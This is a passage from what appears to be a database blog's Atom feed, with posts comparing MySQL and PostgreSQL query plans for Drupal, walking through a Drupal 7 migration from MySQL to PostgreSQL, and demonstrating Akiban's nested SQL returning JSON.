        table: node_comment_statistics
         &lt;span class='nb'&gt;type&lt;/span&gt;: eq_ref
possible_keys: PRIMARY,comment_count
          key: PRIMARY
      key_len: 4
          ref: drupal.node.nid
         rows: 1
        Extra: Using where
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;MySQL chooses to start from the &lt;code&gt;node&lt;/code&gt; table and scans an index on the created column. A temporary table is then created in memory to store the results of this index scan. The items stored in the temporary table are then processed to eliminate duplicates (for the &lt;code&gt;DISTINCT&lt;/code&gt;). For each distinct row in the temporary table, MySQL then performs a join to the &lt;code&gt;node_comment_statistics&lt;/code&gt; table by performing an index lookup using its primary key.&lt;/p&gt;

&lt;p&gt;The PostgreSQL execution plan for this query looks like:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt; Limit  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;6207.15..6207.27 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;50 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;42&lt;span class='o'&gt;)&lt;/span&gt;
   -&amp;gt;  Sort  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;6207.15..6250.75 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;17441 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;42&lt;span class='o'&gt;)&lt;/span&gt;
         Sort Key: node.created
         -&amp;gt;  HashAggregate  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;5453.36..5627.77 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;17441 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;42&lt;span class='o'&gt;)&lt;/span&gt;
               -&amp;gt;  Hash Join  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;1985.31..5278.95 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;17441 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;42&lt;span class='o'&gt;)&lt;/span&gt;
                     Hash Cond: &lt;span class='o'&gt;(&lt;/span&gt;node.nid &lt;span class='o'&gt;=&lt;/span&gt; node_comment_statistics.nid&lt;span class='o'&gt;)&lt;/span&gt;
                     -&amp;gt;  Seq Scan on node  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;0.00..2589.32 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;38539 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;34&lt;span class='o'&gt;)&lt;/span&gt;
                           Filter: &lt;span class='o'&gt;((&lt;/span&gt;nid &amp;gt;&lt;span class='o'&gt;=&lt;/span&gt; 111&lt;span class='o'&gt;)&lt;/span&gt; AND &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;status&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; 1&lt;span class='o'&gt;)&lt;/span&gt; AND &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;comment&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; 2&lt;span class='o'&gt;))&lt;/span&gt;
                     -&amp;gt;  Hash  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;1546.22..1546.22 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;35127 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;16&lt;span class='o'&gt;)&lt;/span&gt;
                           -&amp;gt;  Seq Scan on node_comment_statistics  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;0.00..1546.22 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;35127 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;16&lt;span class='o'&gt;)&lt;/span&gt;
                                 Filter: &lt;span class='o'&gt;(&lt;/span&gt;comment_count &amp;gt;&lt;span class='o'&gt;=&lt;/span&gt; 2::bigint&lt;span class='o'&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;PostgreSQL chooses to start by scanning the &lt;code&gt;node_comment_statistics&lt;/code&gt; table and building an in-memory hash table. This hash table is then probed for possible matches of &lt;code&gt;node.nid = node_comment_statistics.nid&lt;/code&gt; for each row that results from a sequential scan of the &lt;code&gt;node&lt;/code&gt; table. The result of this hash join is then aggregated (for the &lt;code&gt;DISTINCT&lt;/code&gt;) before being sorted and limited to 50 rows.&lt;/p&gt;

&lt;p&gt;It&amp;#8217;s worth noting that with out-of-the-box settings, the above query would do a disk-based sort (the sort method is viewable using &lt;code&gt;EXPLAIN ANALYZE&lt;/code&gt; in PostgreSQL). When doing a disk-based sort, the query takes about 450 ms to execute. However, I ran all my tests with &lt;code&gt;work_mem&lt;/code&gt; set to 4MB, which results in a top-N heapsort being used.&lt;/p&gt;
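
&lt;p&gt;To check the sort method yourself, something like the following works (a sketch; the 4MB value simply mirrors the setting I used):&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='sql'&gt;SET work_mem = &amp;#39;4MB&amp;#39;;
EXPLAIN ANALYZE
SELECT DISTINCT node.title, node.nid, node.created
FROM   node
ORDER  BY node.created
LIMIT  50;
-- in the output, look for a line such as
--   Sort Method: top-N heapsort  Memory: ...
-- versus
--   Sort Method: external merge  Disk: ...
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;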

&lt;h1 id='conclusion'&gt;Conclusion&lt;/h1&gt;

&lt;p&gt;In my opinion, the only issue with using PostgreSQL as your Drupal database is that some contributed modules will not work out of the box with that configuration.&lt;/p&gt;

&lt;p&gt;Certainly, from a performance point of view, I see no issues with using PostgreSQL with Drupal. In fact, for Drupal sites using the Views module (probably the majority), I would say PostgreSQL is probably even a better option than MySQL due to its more advanced optimizer and execution engine. This does assume &lt;code&gt;pgbouncer&lt;/code&gt; is being used and Drupal is not connecting directly to PostgreSQL. Users who do not use &lt;code&gt;pgbouncer&lt;/code&gt; and perform simple benchmarks like the ones I did with &lt;code&gt;ab&lt;/code&gt; are likely to see poor performance against PostgreSQL.&lt;/p&gt;
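
&lt;p&gt;For readers who haven&amp;#8217;t used it, &lt;code&gt;pgbouncer&lt;/code&gt; sits between Drupal and PostgreSQL and pools connections, avoiding the cost of starting a new backend process for every request. A minimal &lt;code&gt;pgbouncer.ini&lt;/code&gt; for this kind of setup might look like the following (the values shown are illustrative, not my exact configuration):&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;[databases]
drupal = host=127.0.0.1 port=5432 dbname=drupal

[pgbouncer]
listen_addr = 127.0.0.1
listen_port = 6432
auth_type = md5
auth_file = /etc/pgbouncer/userlist.txt
pool_mode = transaction
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Drupal&amp;#8217;s &lt;code&gt;settings.php&lt;/code&gt; then points at port 6432 instead of connecting to PostgreSQL directly.&lt;/p&gt;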

&lt;p&gt;I&amp;#8217;m working a lot with Drupal on PostgreSQL these days. I&amp;#8217;ll be sure to share any interesting experiences I have here.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Migrating Drupal 7 Site from MySQL to PostgreSQL on Ubuntu 10.04</title>
   <link href="http://posulliv.github.com/2012/06/26/migrate-mysql-postgres"/>
   <updated>2012-06-26T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2012/06/26/migrate-mysql-postgres</id>
   <content type="html">&lt;p&gt;I recently needed to migrate a Drupal 7 site running on a MySQL 5.5 database to a PostgreSQL 9.1 database. This brief post describes the steps I took to achieve this. The steps outlined here were only tested on Ubuntu 10.04&lt;/p&gt;

&lt;p&gt;First, I installed a fresh copy of PostgreSQL 9.1.&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;sudo apt-get install python-software-properties
sudo add-apt-repository ppa:pitti/postgresql
sudo apt-get update
sudo apt-get install postgresql-9.1 libpq-dev
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;After the installation is complete, a schema and user account are created for Drupal.&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;sudo su postgres
createuser -D -A -P drupal
createdb --encoding&lt;span class='o'&gt;=&lt;/span&gt;UTF8 -O drupal drupal
&lt;span class='nb'&gt;exit&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The above creates a user account named drupal (you will be prompted for a password when running the &lt;code&gt;createuser&lt;/code&gt; command) and a schema named drupal.&lt;/p&gt;

&lt;p&gt;Next, PostgreSQL needs to be configured to allow connections from Apache for Drupal. This is done by modifying the &lt;code&gt;/etc/postgresql/9.1/main/pg_hba.conf&lt;/code&gt; file. The following line needs to be commented out or deleted:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;&lt;span class='nb'&gt;local   &lt;/span&gt;all             all                                     peer
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The line to be added to this file is:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;host    drupal          drupal          127.0.0.1/32            password
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;After this file is modified, PostgreSQL needs to be restarted.&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;sudo service postgresql restart
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
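&lt;p&gt;At this point it is worth verifying that the new rule works by connecting over TCP as the drupal user (you should be prompted for the password set earlier):&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;psql -h 127.0.0.1 -U drupal drupal
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;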
&lt;p&gt;For the migration, we are going to assume &lt;a href='http://drupal.org/project/drush'&gt;drush&lt;/a&gt; is installed on the server where we will be performing the migration. We are also going to assume MySQL and PostgreSQL are running on the same server, although this is certainly not a requirement for these instructions.&lt;/p&gt;
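
&lt;p&gt;As an aside, with drush available, downloading and enabling a module is a one-liner each; the commands below are a sketch of how the migration module introduced next can be installed:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;drush dl dbtng_migrator
drush en -y dbtng_migrator
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;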

&lt;p&gt;The module that performs the real work of the migration is the &lt;a href='http://drupal.org/project/dbtng_migrator'&gt;dbtng_migrator&lt;/a&gt; module. It is installed in the same manner as any other Drupal module (for example with drush, as sketched above). After the module is installed, the &lt;code&gt;settings.php&lt;/code&gt; file for your Drupal installation then needs to be modified to point to your source and destination databases. In my case, I updated my &lt;code&gt;settings.php&lt;/code&gt; file to look like:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='php'&gt;&lt;span class='x'&gt;$databases = array (&lt;/span&gt;
&lt;span class='x'&gt;  &amp;#39;default&amp;#39; =&amp;gt; array (&lt;/span&gt;
&lt;span class='x'&gt;    &amp;#39;default&amp;#39; =&amp;gt;&lt;/span&gt;
&lt;span class='x'&gt;      array (&lt;/span&gt;
&lt;span class='x'&gt;        &amp;#39;database&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;        &amp;#39;username&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;        &amp;#39;password&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;        &amp;#39;host&amp;#39; =&amp;gt; &amp;#39;localhost&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;        &amp;#39;port&amp;#39; =&amp;gt; &amp;#39;&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;        &amp;#39;driver&amp;#39; =&amp;gt; &amp;#39;mysql&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;        &amp;#39;prefix&amp;#39; =&amp;gt; &amp;#39;&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      ),&lt;/span&gt;
&lt;span class='x'&gt;  ),&lt;/span&gt;
&lt;span class='x'&gt;  &amp;#39;dest&amp;#39; =&amp;gt; array (&lt;/span&gt;
&lt;span class='x'&gt;    &amp;#39;default&amp;#39; =&amp;gt;&lt;/span&gt;
&lt;span class='x'&gt;      array (&lt;/span&gt;
&lt;span class='x'&gt;        &amp;#39;database&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;        &amp;#39;username&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;        &amp;#39;password&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;        &amp;#39;host&amp;#39; =&amp;gt; &amp;#39;localhost&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;        &amp;#39;port&amp;#39; =&amp;gt;&amp;#39;&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;        &amp;#39;driver&amp;#39; =&amp;gt; &amp;#39;pgsql&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;        &amp;#39;prefix&amp;#39; =&amp;gt;&amp;#39;&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      ),&lt;/span&gt;
&lt;span class='x'&gt;    ),&lt;/span&gt;
&lt;span class='x'&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;As you can see, in my case the default connection points at a MySQL database and I am planning on migrating to a PostgreSQL database running on the same machine.&lt;/p&gt;

&lt;p&gt;Now, to perform the migration from the command line using &lt;code&gt;drush&lt;/code&gt;, it&amp;#8217;s as simple as:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;drush cache-clear drush
drush dbtng-replicate default dest
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;When the migration finishes, output similar to the following will be seen (this is just a small portion of the output):&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;&lt;span class='nv'&gt;$ &lt;/span&gt;drush dbtng-replicate default dest
...
cache_update successfully migrated.                    &lt;span class='o'&gt;[&lt;/span&gt;status&lt;span class='o'&gt;]&lt;/span&gt;
authmap successfully migrated.                         &lt;span class='o'&gt;[&lt;/span&gt;status&lt;span class='o'&gt;]&lt;/span&gt;
role_permission successfully migrated.                 &lt;span class='o'&gt;[&lt;/span&gt;status&lt;span class='o'&gt;]&lt;/span&gt;
role successfully migrated.                            &lt;span class='o'&gt;[&lt;/span&gt;status&lt;span class='o'&gt;]&lt;/span&gt;
users successfully migrated.                           &lt;span class='o'&gt;[&lt;/span&gt;status&lt;span class='o'&gt;]&lt;/span&gt;
users_roles successfully migrated.                     &lt;span class='o'&gt;[&lt;/span&gt;status&lt;span class='o'&gt;]&lt;/span&gt;
&lt;span class='err'&gt;$&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Finally, after the database migration is successfully completed, the &lt;code&gt;settings.php&lt;/code&gt; file needs to be updated to point to the new database. In my case, the database settings after my migration looked like:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='php'&gt;&lt;span class='x'&gt;$databases = array (&lt;/span&gt;
&lt;span class='x'&gt;  &amp;#39;default&amp;#39; =&amp;gt;&lt;/span&gt;
&lt;span class='x'&gt;  array (&lt;/span&gt;
&lt;span class='x'&gt;    &amp;#39;default&amp;#39; =&amp;gt;&lt;/span&gt;
&lt;span class='x'&gt;    array (&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;database&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;username&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;password&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;host&amp;#39; =&amp;gt; &amp;#39;localhost&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;port&amp;#39; =&amp;gt; &amp;#39;&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;driver&amp;#39; =&amp;gt; &amp;#39;pgsql&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;prefix&amp;#39; =&amp;gt; &amp;#39;&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;    ),&lt;/span&gt;
&lt;span class='x'&gt;  ),&lt;/span&gt;
&lt;span class='x'&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;That was it for my migration. Granted, I had a small Drupal site to migrate and the only additional modules I had installed were the views and devel modules, so I did not need to worry about contributed modules working with the PostgreSQL database. The next step would be to configure PostgreSQL in a more optimal manner, which I did not go into here.&lt;/p&gt;
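
&lt;p&gt;As a rough starting point for that tuning, these are the kinds of &lt;code&gt;postgresql.conf&lt;/code&gt; settings I would look at first (the values below are illustrative for a small dedicated box, not recommendations):&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;shared_buffers = 512MB        # roughly 25% of RAM is a common rule of thumb
work_mem = 4MB                # per-sort memory; affects sort and hash strategies
effective_cache_size = 1GB    # planner hint for how much the OS will cache
checkpoint_segments = 16      # smooth out checkpoint I/O spikes
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</content>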
 </entry>
 
 <entry>
   <title>How Akiban Saves Babies</title>
   <link href="http://posulliv.github.com/2012/05/24/nested-access-intro"/>
   <updated>2012-05-24T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2012/05/24/nested-access-intro</id>
   <content type="html">&lt;p&gt;I came across an interesting article from Iggy Fernandez in the NoCOUG journal &lt;a href='http://www.nocoug.org/Journal/NoCOUG_Journal_201205.pdf'&gt;this month&lt;/a&gt; that prompted me to write a short little post showing a little of what we are working on at Akiban. Iggy also has a &lt;a href='http://iggyfernandez.wordpress.com/2012/04/07/relational-joins-are-expensive-by-definition-not/'&gt;blog post&lt;/a&gt; that is pretty similar to the article.&lt;/p&gt;

&lt;p&gt;We are big fans of the relational model and one thing that I loved about Iggy&amp;#8217;s article was the reiteration of the fact that Codd never dictated how data should be stored. Hence, at Akiban we are working on a new relational database that stores data in a different manner that we refer to as &lt;a href='http://www.akiban.com/table-grouping'&gt;table grouping&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;In this post, I wanted to briefly show how we could group the schema Iggy used in his article and how that data can be retrieved. Below I show the DDL for the tables as we would create them in Akiban. You will notice the one addition in our DDL is the specification of a grouping foreign key. The DDL below creates a single table group with the &lt;code&gt;employees&lt;/code&gt; table as the root and all other tables as children.&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;create table employees 
&lt;span class='o'&gt;(&lt;/span&gt;
  emp_no int primary key not null,
  name varchar&lt;span class='o'&gt;(&lt;/span&gt;16&lt;span class='o'&gt;)&lt;/span&gt;,
  birth_date date
&lt;span class='o'&gt;)&lt;/span&gt;;

create table job_history 
&lt;span class='o'&gt;(&lt;/span&gt;
  emp_no int not null,
 job_date date not null,
 title varchar&lt;span class='o'&gt;(&lt;/span&gt;16&lt;span class='o'&gt;)&lt;/span&gt;,
 grouping foreign key &lt;span class='o'&gt;(&lt;/span&gt;emp_no&lt;span class='o'&gt;)&lt;/span&gt; references employees
&lt;span class='o'&gt;)&lt;/span&gt;;

create table salary_history 
&lt;span class='o'&gt;(&lt;/span&gt;
  emp_no int not null,
  job_date date not null,
  salary_date date not null,
  salary decimal,
  grouping foreign key &lt;span class='o'&gt;(&lt;/span&gt;emp_no&lt;span class='o'&gt;)&lt;/span&gt; references employees
&lt;span class='o'&gt;)&lt;/span&gt;;

create table children 
&lt;span class='o'&gt;(&lt;/span&gt;
  emp_no int not null,
  child_name varchar&lt;span class='o'&gt;(&lt;/span&gt;16&lt;span class='o'&gt;)&lt;/span&gt; not null,
  birth_date date,
  grouping foreign key &lt;span class='o'&gt;(&lt;/span&gt;emp_no&lt;span class='o'&gt;)&lt;/span&gt; references employees
&lt;span class='o'&gt;)&lt;/span&gt;;

insert into employees values &lt;span class='o'&gt;(&lt;/span&gt;1, &lt;span class='s1'&gt;&amp;#39;IGNATIES&amp;#39;&lt;/span&gt;, &lt;span class='s1'&gt;&amp;#39;1970-01-01&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;)&lt;/span&gt;;

insert into children values &lt;span class='o'&gt;(&lt;/span&gt;1, &lt;span class='s1'&gt;&amp;#39;INIGA&amp;#39;&lt;/span&gt;, &lt;span class='s1'&gt;&amp;#39;2001-01-01&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;)&lt;/span&gt;;
insert into children values &lt;span class='o'&gt;(&lt;/span&gt;1, &lt;span class='s1'&gt;&amp;#39;INIGO&amp;#39;&lt;/span&gt;, &lt;span class='s1'&gt;&amp;#39;2001-01-01&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;)&lt;/span&gt;;

insert into job_history values &lt;span class='o'&gt;(&lt;/span&gt;1, &lt;span class='s1'&gt;&amp;#39;1991-01-01&amp;#39;&lt;/span&gt;, &lt;span class='s1'&gt;&amp;#39;PROGRAMMER&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;)&lt;/span&gt;;
insert into job_history values &lt;span class='o'&gt;(&lt;/span&gt;1, &lt;span class='s1'&gt;&amp;#39;1992-01-01&amp;#39;&lt;/span&gt;, &lt;span class='s1'&gt;&amp;#39;DATABASE ADMIN&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;)&lt;/span&gt;;

insert into salary_history values &lt;span class='o'&gt;(&lt;/span&gt;1, &lt;span class='s1'&gt;&amp;#39;1991-01-01&amp;#39;&lt;/span&gt;, &lt;span class='s1'&gt;&amp;#39;1991-01-02&amp;#39;&lt;/span&gt;, 1000&lt;span class='o'&gt;)&lt;/span&gt;;
insert into salary_history values &lt;span class='o'&gt;(&lt;/span&gt;1, &lt;span class='s1'&gt;&amp;#39;1991-01-01&amp;#39;&lt;/span&gt;, &lt;span class='s1'&gt;&amp;#39;1991-01-03&amp;#39;&lt;/span&gt;, 1000&lt;span class='o'&gt;)&lt;/span&gt;;
insert into salary_history values &lt;span class='o'&gt;(&lt;/span&gt;1, &lt;span class='s1'&gt;&amp;#39;1992-01-01&amp;#39;&lt;/span&gt;, &lt;span class='s1'&gt;&amp;#39;1992-01-02&amp;#39;&lt;/span&gt;, 2000&lt;span class='o'&gt;)&lt;/span&gt;;
insert into salary_history values &lt;span class='o'&gt;(&lt;/span&gt;1, &lt;span class='s1'&gt;&amp;#39;1992-01-01&amp;#39;&lt;/span&gt;, &lt;span class='s1'&gt;&amp;#39;1992-01-03&amp;#39;&lt;/span&gt;, 2000&lt;span class='o'&gt;)&lt;/span&gt;;

&lt;span class='nb'&gt;test&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;&amp;gt; &lt;span class='k'&gt;select&lt;/span&gt; * from employees;
 emp_no |   name   | birth_date 
--------+----------+------------
      1 | IGNATIES | 1970-01-01
&lt;span class='o'&gt;(&lt;/span&gt;1 row&lt;span class='o'&gt;)&lt;/span&gt;

Time: 3.529 ms
&lt;span class='nb'&gt;test&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;&amp;gt; &lt;span class='k'&gt;select&lt;/span&gt; * from children;
 emp_no | child_name | birth_date 
--------+------------+------------
      1 | INIGA      | 2001-01-01
      1 | INIGO      | 2001-01-01
&lt;span class='o'&gt;(&lt;/span&gt;2 rows&lt;span class='o'&gt;)&lt;/span&gt;

Time: 4.058 ms
&lt;span class='nb'&gt;test&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;&amp;gt; &lt;span class='k'&gt;select&lt;/span&gt; * from job_history;
 emp_no |  job_date  |     title      
--------+------------+----------------
      1 | 1991-01-01 | PROGRAMMER
      1 | 1992-01-01 | DATABASE ADMIN
&lt;span class='o'&gt;(&lt;/span&gt;2 rows&lt;span class='o'&gt;)&lt;/span&gt;

Time: 3.954 ms
&lt;span class='nb'&gt;test&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;&amp;gt; &lt;span class='k'&gt;select&lt;/span&gt; * from salary_history;
 emp_no |  job_date  | salary_date | salary 
--------+------------+-------------+--------
      1 | 1991-01-01 | 1991-01-02  |   1000
      1 | 1991-01-01 | 1991-01-03  |   1000
      1 | 1992-01-01 | 1992-01-02  |   2000
      1 | 1992-01-01 | 1992-01-03  |   2000
&lt;span class='o'&gt;(&lt;/span&gt;4 rows&lt;span class='o'&gt;)&lt;/span&gt;

Time: 3.868 ms
&lt;span class='nb'&gt;test&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;&amp;gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Ok, now we have a simple dataset with 1 employee. In Akiban, all data for that 1 employee is essentially stored pre-joined. I explained previously how we accomplish this in a &lt;a href='http://www.akiban.com/blog/2011/09/22/introducing-hkey'&gt;post&lt;/a&gt; on the company blog so I won&amp;#8217;t go into detail here.&lt;/p&gt;

&lt;p&gt;Now what if I wanted to get all employee information for this person in one go? In Iggy&amp;#8217;s article, Oracle&amp;#8217;s multi-table clustering functionality is used to make doing that efficient, and then SQL/XML is used to query it and construct a single XML document with all of the employee&amp;#8217;s information.&lt;/p&gt;

&lt;p&gt;Well, in Akiban, we&amp;#8217;ve implemented support for &lt;a href='http://www.cs.utexas.edu/ftp/techreports/tr85-19.pdf'&gt;nested SQL&lt;/a&gt;. This allows us to return data as objects instead of returning data in tabular form. We decided to format the objects we return in JSON for our first implementation of this functionality. Now if I want to get all information for employee 1 in a single query with a nested result in JSON format, I simply need to enable that mode in Akiban and issue a query like the one shown below.&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;&lt;span class='k'&gt;select &lt;/span&gt;
&lt;span class='k'&gt;  &lt;/span&gt;employees.*,
  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='k'&gt;select &lt;/span&gt;children.* from children where employees.emp_no &lt;span class='o'&gt;=&lt;/span&gt; children.emp_no&lt;span class='o'&gt;)&lt;/span&gt;,                       
  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='k'&gt;select &lt;/span&gt;job_history.* from job_history where employees.emp_no &lt;span class='o'&gt;=&lt;/span&gt; job_history.emp_no&lt;span class='o'&gt;)&lt;/span&gt;,                
  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='k'&gt;select &lt;/span&gt;salary_history.* from salary_history where employees.emp_no &lt;span class='o'&gt;=&lt;/span&gt; salary_history.emp_no&lt;span class='o'&gt;)&lt;/span&gt; 
from 
  employees
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Ok, now to enable nested result sets and fire the query off. This is exactly what the interaction with our system will look like.&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;&lt;span class='nb'&gt;test&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;&amp;gt; &lt;span class='nb'&gt;set &lt;/span&gt;&lt;span class='nv'&gt;OutputFormat&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;json&amp;#39;&lt;/span&gt;;
SET OutputFormat
Time: 1.290 ms
&lt;span class='nb'&gt;test&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;&amp;gt; &lt;span class='k'&gt;select &lt;/span&gt;
&lt;span class='nb'&gt;test&lt;/span&gt;-&amp;gt;   employees.*,
&lt;span class='nb'&gt;test&lt;/span&gt;-&amp;gt;   &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='k'&gt;select &lt;/span&gt;children.* from children where employees.emp_no &lt;span class='o'&gt;=&lt;/span&gt; children.emp_no&lt;span class='o'&gt;)&lt;/span&gt;,                       
&lt;span class='nb'&gt;test&lt;/span&gt;-&amp;gt;   &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='k'&gt;select &lt;/span&gt;job_history.* from job_history where employees.emp_no &lt;span class='o'&gt;=&lt;/span&gt; job_history.emp_no&lt;span class='o'&gt;)&lt;/span&gt;,                
